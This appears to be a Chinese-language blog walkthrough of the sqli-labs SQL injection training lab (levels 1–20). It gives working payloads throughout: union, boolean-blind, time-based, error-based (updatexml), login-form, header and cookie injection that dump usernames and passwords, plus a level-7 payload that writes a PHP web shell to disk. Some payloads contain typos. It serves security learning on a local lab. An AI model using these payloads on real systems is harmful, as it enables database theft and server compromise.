注意:有的代码可能存在中文标点导致命令执行不成功,多注意一下。
数据库名:database()
数据库版本: version()
数据库用户: user()
操作系统: @@version_compile_os
系统用户名: system_user()
当前用户名: current_user
连接数据库的用户名:session_user()
读取数据库路径:@@datadir
MYSQL安装路径:@@basedir
储存所有表名信息的表 : information_schema.tables
表名 : table_name
数据库名: table_schema
列名 : column_name
储存所有列名信息的表 : information_schema.columns
判断注入点----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据 其实不管是联合查询还是盲注之类的基本都这样,大同小异。 http://localhost/sqli-labs-master/Less-1/?id=1’ – -
http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- -
http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=2-- - http://localhost/sqli-labs-master/Less-1/?id=1’ order by 3-- -
http://localhost/sqli-labs-master/Less-1/?id=1’ order by 4-- - http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,2,3-- -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,database(),user()-- -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=“security”),3 – -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=“security” and table_name=“users”),3 – -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(concat_ws(id,username,password)) from users),3-- -
第二关也是联合查询注入跟上关一样,只是闭合方式不同。
二、 http://localhost/sqli-labs-master/Less-2/?id=1 and 1=1
http://localhost/sqli-labs-master/Less-2/?id=1 and 1=2
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4
http://localhost/sqli-labs-master/Less-2/?id=1 union select 1,2,3
http://localhost/sqli-labs-master/Less-2/?id=-1nion select 1,database(),user()
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=“security”),3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=“security” and table_name=“users”),3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat_ws(id,username,password)) from users),3
第三关也是联合查询注入,除闭合方式不同。 这关就只显示下注入点吧,其他的与上面两关一模一样
http://localhost/sqli-labs-master/Less-3/?id=1’
http://localhost/sqli-labs-master/Less-3/?id=1’) and1=1-- -
http://localhost/sqli-labs-master/Less-3/?id=1’) and1=2- -
第四关也是除了闭合方式不同,其他的跟上几关一摸一样
http://localhost/sqli-labs-master/Less-4/?id=1’
http://localhost/sqli-labs-master/Less-4/?id=1”
http://localhost/sqli-labs-master/Less-4/?id=1”) and 1=1-- -
http://localhost/sqli-labs-master/Less-4/?id=1”) and 1=2-- -
第五关是布尔型盲注 可以说布尔值盲注非常麻烦,一定要有耐心,当然可以使用一些工具或脚本,反正我现在还是个小菜鸡不会写脚本,以后会慢慢了解的。 这关的布尔值盲注正确就返回“You are in …”,错误就不会反回 多的不说开干
http://localhost/sqli-labs-master/Less-5/?id=1’ – -
http://localhost/sqli-labs-master/Less-5/?id=1’ and 1=1-- -
http://localhost/sqli-labs-master/Less-5/?id=1’ and 1=2-- -
http://localhost/sqli-labs-master/Less-5/?id=1’ and length(database()) <10-- -
http://localhost/sqli-labs-master/Less-5/?id=1’ and length(database()) =8 – -
http://localhost/sqli-labs-master/Less-5/?id=1’ and ascii(substr(database(),1,1))>70-- -
http://localhost/sqli-labs-master/Less-5/?id=1’ and ascii(substr(database(),1,1))=115 – -
http://localhost/sqli-labs-master/Less-5/?id=1’ and ascii(substr(database(),2,1))=101
http://localhost/sqli-labs-master/Less-5/?id=1’ and (select count(*) from information_schema.tables where table_schema=“security”)>3-- -
http://localhost/sqli-labs-master/Less-5/?id=1’ and (select count(*) from information_schema.tables where table_schema=“security”)=4 – -
http://localhost/sqli-labs-master/Less-5/?id=1’ and (select length(table_name) from information_schema.tables where table_schema=“security” limit 0,1)>5 – -
http://localhost/sqli-labs-master/Less-5/?id=1’ and (select length(table_name) from information_schema.tables where table_schema=“security” limit 0,1)=6-- -
http://localhost/sqli-labs-master/Less-5/?id=1’ and (ascii(substr((select table_name from information_schema.tables where table_schema="security"limit 0,1),1,1)))>70-- -
http://localhost/sqli-labs-master/Less-5/?id=1’ and (ascii(substr((select table_name from information_schema.tables where table_schema="security"limit 0,1),1,1)))=101-- -
http://localhost/sqli-labs-master/Less-5/?id=1’ and (select count(*) from information_schema.columns where table_schema=“security” and table_name=“users”) =3 – -
http://localhost/sqli-labs-master/Less-5/?id=1’ and (select length(column_name) from information_schema.columns where table_schema=“security” and table_name=“users” limit 0,1)=2 – -
http://localhost/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select column_name from information_schema.columns where table_schema=“security” and table_name=“users” limit 0,1),1,1))=105 – -
http://localhost/sqli-labs-master/Less-5/?id=1’ and length((select username from users limit 0,1))=4 – -
http://localhost/bac/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select username from users limit 0,1),1,1))=68 – -
这关其实跟上一关是一样的,只是闭合方式为双引号 http://localhost/sqli-labs-master/Less-6/?id=1"–
http://localhost/sqli-labs-master/Less-6/?id=1"and 1=1-
http://localhost/sqli-labs-master/Less-6/?id=1"and 1=2–
http://localhost/sqli-labs-master/Less-7/?id=1’))-- -
http://localhost/sqli-labs-master/Less-7/?id=1’))and1=1- -
http://localhost/sqli-labs-master/Less-7/?id=1’))and1=2 – -
http://localhost/sqli-labs-master/Less-7/?id=1’)) order by 3-- -
http://localhost/sqli-labs-master/Less-7/?id=1’)) union select 1,2,3-- -
http://localhost/sqli-labs-master/Less-7/?id=1’)) union select 1,2,’<?php @eval($_POST[“crow”]);?>’ into outfile"C:\phpStudy\PHPTutorial\MySQL\data\test.php"-- -
然后可以用“中国菜刀”这个工具进行连接了。
第八关也是布尔值盲注,只是闭合方式为单引号,其他的都跟第五关一样的
第九关是时间盲注 http://localhost/sqli-labs-master/Less-9/?id=1’ http://localhost/sqli-labs-master/Less-9/?id=1’ and sleep(5) – -
http://localhost/sqli-labs-master/Less-9/?id=1’ and if(length(database())=8,sleep(8),1)-- -
这个当为8的时候很快加载,如果是其他参数的时候则会等待八秒左右,基于后面的参数
http://localhost/sqli-labs-master/Less-9/?id=1’ and if (((ascii(substr(database(),1,1)))>50),sleep(10),0)-- -
http://localhost/sqli-labs-master/Less-9/?id=1’ and if (((ascii(substr(database(),2,1)))>50),sleep(10),0)-- -
http://localhost/sqli-labs-master/Less-9/?id=1’and if((ascii(substr((select table_name from information_schema.tables where table_schema=“security” limit 0,1),1,1)))>120,1,sleep(10))-- -
http://localhost/sqli-labs-master/Less-9/?id=1’and if((ascii(substr((select table_name from information_schema.tables where table_schema=“security” limit 0,1),1,1)))=115,1,sleep(10))-- -
http://localhost/sqli-labs-master/Less-9/?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))))=75,1,sleep(10))-- -
第十关也是时间盲注 除了闭合方式为双引号,其他的跟第九关都一样。
第十一关可以在登陆框中输入 这一关也就是联合查询注入 1‘ or 1=1 登陆成功则证明为单引号闭合 -1’ order by 3-- -
-1’ union select 1,2-- - -1’ union select 1,database()-- - -1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- - -1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’ – - -1’ union select 1,(select group_concat(concat_ws(id,username,password)) from users)-- -
十二关的话除了闭合方式为"),其他的与第十一关是一摸一样的 我们可以在每关的代码中加入一下两行代码: echo $sql; echo “”; 这样输入id=1或admin登陆,可以直接显示出闭合方式,建议前面几关自己找,后面可以投机取巧一下,嘿嘿!
第十三、十四、十五、十六关均可使用盲注,其详细方法写在了第十三关。 uname=admin’) or 1=1#&passwd=admin&submit=Submit uname=admin’) or if(length(database())=8,1,sleep(5))#&passwd=admin&submit=Submit uname=admin’) or left(database() ,1)>‘a’#&passwd=admin&submit=Submit uname=admin’) or left(database() ,1)=‘s’#&passwd=admin&submit=Submit uname=admin’) or left(database() ,8)=‘security’#&passwd=admin&submit=Submit
uname=admin’) or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=‘u’#&passwd=admin&submit=Submit
uname=admin’) or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),5)=‘users’#&passwd=admin&submit=Submit
uname=admin’) or left((select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),2)=‘id’ #&passwd=admin&submit=Submit uname=admin’) or left((select id from users limit 0,1),1)=‘1’ #&passwd=admin&submit=Submit
第十四关除闭合方式为双引号,其他的与第十三关方法都是一样的
第十五关除闭合方式为单引号,其他的与第十三关方法都是一样的
第十六关除闭合方式为双引号加括号"),其他的与第十三关方法都是一样的
第十七关插入一个小知识 updatexml函数感兴趣的话可以自行百度 语法: select updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1;
uname=admin &passwd=admin&submit=Submit uname=admin&passwd=asdf&submit=Submit
uname=admin’#&passwd=asdf&submit=Submit 这里显示我们的单引号被注释掉了,所以说只能对password进行操作 uname=admin&passwd=asdf’ and updatexml(1,concat(0x7e,(select schema_name from information_schemata limit 0,1)),1)#&submit=Submit
uname=admin&passwd=asdf’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1)#&submit=Submit
uname=admin&passwd=asdf’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘emails’ limit 0,1)),1)#&submit=Submit uname=admin&passwd=asdf’ and updatexml(1,concat(0x7e,(select id from emails limit 0,1)),1)#&submit=Submit
第十八关在做之前建议先重置下数据库,因为十七关的原因密码被更改,不重置数据库的话也可以,那就得使用第十七关的密码,两种方法都可以。
uname=admin’#&passwd=admin’#&submit=Submit 我们可以发现不管是用户名还是密码都被注释掉了,所以不能像之前那样进行注入,这关我用的是火狐的一款插件ModHeader
’ or updatexml(1,concat(0x7e,(database())),1) or ‘1’='1
uname=admin&passwd=admin&submit=Submit ’ or updatexml(1,concat(0x7e,( select schema_name from information_schema.schemata limit 0,1)),1) or ‘1’='1# ’ or updatexml(1,concat(0x7e,( select table_name from information_schema.tables where table_schema=database() limit 0,1)),1) or ‘1’='1# ’ or updatexml(1,concat(0x7e,( select column_name from information_schema.columns where table_schema=database() and table_name=’emails’ limit 1,1)),1) or ‘1’='1#
’ or updatexml(1,concat(0x7e,( select username from security.users limit 0,1)),1) or ‘1’='1#
第十九关与第十八关一样,
admin登陆 这关我们从题目了解到是cookie注入,我用的是火狐插件Cookie-Editor 每输入一个命令记着要保存,不然无效 利用cookie editor工具 查看有无漏洞 ’ union select 1,2,3# ‘ union select 1,2,database()# uname=-1’ union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’)-- - uname=-1’ union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=‘users’)# uname=-1’ union select 1,2,group_concat(id,username,password) from users#
